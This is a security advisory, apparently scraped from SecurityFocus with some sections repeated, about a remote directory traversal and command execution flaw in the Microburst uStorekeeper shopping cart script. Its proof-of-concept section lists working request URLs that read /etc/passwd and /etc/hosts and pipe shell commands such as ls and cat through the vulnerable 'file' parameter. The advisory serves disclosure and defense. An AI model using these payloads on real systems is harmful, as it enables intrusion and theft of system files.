Microburst uStorekeeper Remote Arbitrary Commands Vulnerability
BID:2536
Info
Microburst uStorekeeper Remote Arbitrary Commands Vulnerability
| Bugtraq ID: | 2536 |
| Class: | Input Validation Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Apr 02 2001 12:00AM |
| Updated: | Apr 02 2001 12:00AM |
| Credit: | Reported to bugtraq by "UkR hacking team" <[email protected]> on Mon, 2 Apr 2001 |
| Vulnerable: |
Microburst uStorekeeper Online Shopping System 1.8.1 Microburst uStorekeeper Online Shopping System 1.6.9 Microburst uStorekeeper Online Shopping System 1.6.7 Microburst uStorekeeper Online Shopping System 1.6.1 Microburst uStorekeeper Online Shopping System 1.6 Microburst uStorekeeper Online Shopping System 1.5.5 Microburst uStorekeeper Online Shopping System 1.5.3 Microburst uStorekeeper Online Shopping System 1.5.2 Microburst uStorekeeper Online Shopping System 1.1.5 Microburst uStorekeeper Online Shopping System 1.1 Microburst uStorekeeper Online Shopping System 1.0.7 Microburst uStorekeeper Online Shopping System 1.0.5 Microburst uStorekeeper Online Shopping System 1.0.3 Microburst uStorekeeper Online Shopping System 1.0.1 |
| Not Vulnerable: | |
Discussion
Microburst uStorekeeper Remote Arbitrary Commands Vulnerability
A vulnerability exists in versions of uStorekeeper Online Shopping System from Microburst Technologies.
The script fails to properly validate user-supplied input, allowing remote users to submit URLs containing '/../' sequences and arbitrary filenames or commands, which will be executed or displayed with the privilege level of the webserver user.
This permits the remote user to request files and execute commands from arbitrary locations on the host filesystem, outside the script's normal directory scope.
A vulnerability exists in versions of uStorekeeper Online Shopping System from Microburst Technologies.
The script fails to properly validate user-supplied input, allowing remote users to submit URLs containing '/../' sequences and arbitrary filenames or commands, which will be executed or displayed with the privilege level of the webserver user.
This permits the remote user to request files and execute commands from arbitrary locations on the host filesystem, outside the script's normal directory scope.
Exploit / POC
Microburst uStorekeeper Remote Arbitrary Commands Vulnerability
http://www.example.com/cgi-bin/ustorekeeper.pl?command=goto&file=../../../../../../../../etc/hosts
http://www.example.com/cgi-bin/ustorekeeper.pl?command=goto&file=../../../../../../../../bin/ls |
http://www.example.com/cgi-bin/ustorekeeper.pl?command=goto&file=../../../../../../../../../../etc/passwd
http://www.example .com/cgi-bin/ustorekeeper.pl?command=goto&file=../../../../../../../../.
./../../../../bin/cat%20ustorekeeper.pl|
http://www.example.com/cgi-bin/ustorekeeper.pl?command=goto&file=../../../../../../../../etc/hosts
http://www.example.com/cgi-bin/ustorekeeper.pl?command=goto&file=../../../../../../../../bin/ls |
http://www.example.com/cgi-bin/ustorekeeper.pl?command=goto&file=../../../../../../../../../../etc/passwd
http://www.example .com/cgi-bin/ustorekeeper.pl?command=goto&file=../../../../../../../../.
./../../../../bin/cat%20ustorekeeper.pl|
Solution / Fix
Microburst uStorekeeper Remote Arbitrary Commands Vulnerability
Solution:
Currently the SecurityFocus staff are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected] <mailto:[email protected]>.
Solution:
Currently the SecurityFocus staff are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected] <mailto:[email protected]>.
References
Microburst uStorekeeper Remote Arbitrary Commands Vulnerability
References:
References:
- Microburst Technologies Homepage (Microburst)